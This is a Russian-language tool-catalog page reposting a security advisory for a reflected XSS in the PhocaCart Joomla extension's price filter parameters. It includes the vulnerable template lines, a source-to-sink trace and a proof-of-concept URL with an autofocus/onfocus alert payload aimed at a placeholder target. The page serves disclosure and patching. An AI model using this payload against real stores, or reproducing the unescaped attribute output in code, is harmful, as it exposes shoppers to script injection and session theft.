Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/toanln-cov/cve-2026-76565
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьСтатьи и Исследования
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

Отражённый XSS через параметры фильтра price_from и price_to в PhocaCart

Репозиторий
3 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отражённый XSS через параметры фильтра price_from / price_to в PhocaCart

PhocaCart ≤ 6.1.7 — неаутентифицированный злоумышленник внедряет произвольный JavaScript через специально сформированный URL фильтра цены

CVE CVSS v4.0 CWE-79 Affected Researcher


СВОДКА

PhocaCart 6.1.7 для Joomla уязвим к отражённому межсайтовому скриптингу (XSS) через GET-параметры price_from и price_to, когда модуль mod_phocacart_filter установлен и опубликован. Параметры обрабатываются с помощью входного фильтра Joomla 'string', который применяет только strip_tags() — он не применяет . Необработанные значения напрямую выводятся в HTML-атрибуты в форме фильтра цены, отображаемой модулем .

Скачать инструмент
htmlspecialchars()
value=""
mod_phocacart_filter

Злоумышленник передаёт жертве специально сформированный URL. Когда жертва загружает страницу, внедрённый обработчик события выполняется в её браузере. Аутентификация не требуется. Для атаки требуется, чтобы модуль mod_phocacart_filter (отдельно распространяемый модуль) был установлен и опубликован.


ЗАТРАГИВАЕМЫЕ ВЕРСИИ

КОМПОНЕНТУЯЗВИМАЯТЕСТИРОВАЛОСЬ НАИСПРАВЛЕНА
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

ДЕТАЛИ УЯЗВИМОСТИ

Тип: отражённый XSS (CWE-79) Требуется аутентификация: нет — публичная витрина магазина Требуется CSRF-токен: нет (GET-запрос) Файл стока: site/layouts/form_filter_horizontal_text.php:65,71

Корневая причина

Входной фильтр Joomla 'string' вызывает strip_tags() — он удаляет HTML-теги, но оставляет HTML-спецсимволы, такие как ", ' и >, незакодированными. GET-параметры price_from и price_to извлекаются с помощью этого фильтра и сохраняются в $data['getparams']. Файлы шаблонов выводят эти значения напрямую в атрибуты value="" без вызова htmlspecialchars(), что позволяет внедрение в контекст атрибута.

Поток данных — от источника к стоку:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ фильтр Joomla 'string' = только strip_tags()
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [без изменений!]

  filter.php:494    $inA[] = $v  // без кодирования
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → БЕЗ htmlspecialchars()
  → Отображается: value="" onmouseover="alert(document.domain)"
  → XSS срабатывает при наведении мыши

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — УЯЗВИМЫЙ СТОК

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- БЕЗ htmlspecialchars() -->
  id="phPriceFrom..." />

Аналогичный шаблон стока также существует в form_filter_text.php:81,87 (вариант вертикальной компоновки). Оба параметра price_from и price_to одинаково уязвимы.


ПОДТВЕРЖДЕНИЕ КОНЦЕПЦИИ

1. Создание вредоносного URL

Злоумышленник формирует URL, нацеленный на представление товаров магазина, с полезной нагрузкой в виде обработчика события, внедрённой в параметр price_from. Полезная нагрузка выходит за пределы контекста атрибута value="".

root@kitploit:~
Полезная нагрузка (сырая): " autofocus onfocus="alert(document.domain)
URL-кодированная:          %22%20autofocus%20onfocus%3D%22alert(document.domain)

Сформированный URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. Жертва загружает страницу — XSS срабатывает при загрузке страницы

Когда жертва открывает сформированный URL, страница товаров магазина отображает форму фильтра цены. Внедрённые атрибуты присутствуют в элементе <input>. С полезной нагрузкой autofocus onfocus JavaScript выполняется немедленно при загрузке страницы без какого-либо дальнейшего взаимодействия с пользователем.

Отображаемый HTML (уязвимый):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

Диалоговое окно XSS-оповещения срабатывает в браузере жертвы — alert(document.domain) подтверждает выполнение на витрине магазина

XSS срабатывает в браузере жертвы — alert(document.domain) подтверждает контекст выполнения на витрине магазина


ВОЗДЕЙСТВИЕ

  1. Кража файлов cookie сеанса — боевая полезная нагрузка может похитить cookie сеанса жертвы на управляемый злоумышленником сервер, что позволяет захватить учётную запись.
  2. Фишинг / сбор учётных данных — полезная нагрузка может перенаправить жертву на поддельную страницу входа, размещённую на домене злоумышленника, перехватывая учётные данные под доверенным доменным именем магазина.
  3. Распространение вредоносного ПО — доверенный источник магазина может быть использован для доставки drive-by загрузок или эксплойт-китов жертвам, перешедшим по ссылкам, созданным злоумышленником.

ССЫЛКИ

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • GitHub Advisory: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • Репозиторий поставщика: https://github.com/PhocaDesign/PhocaCart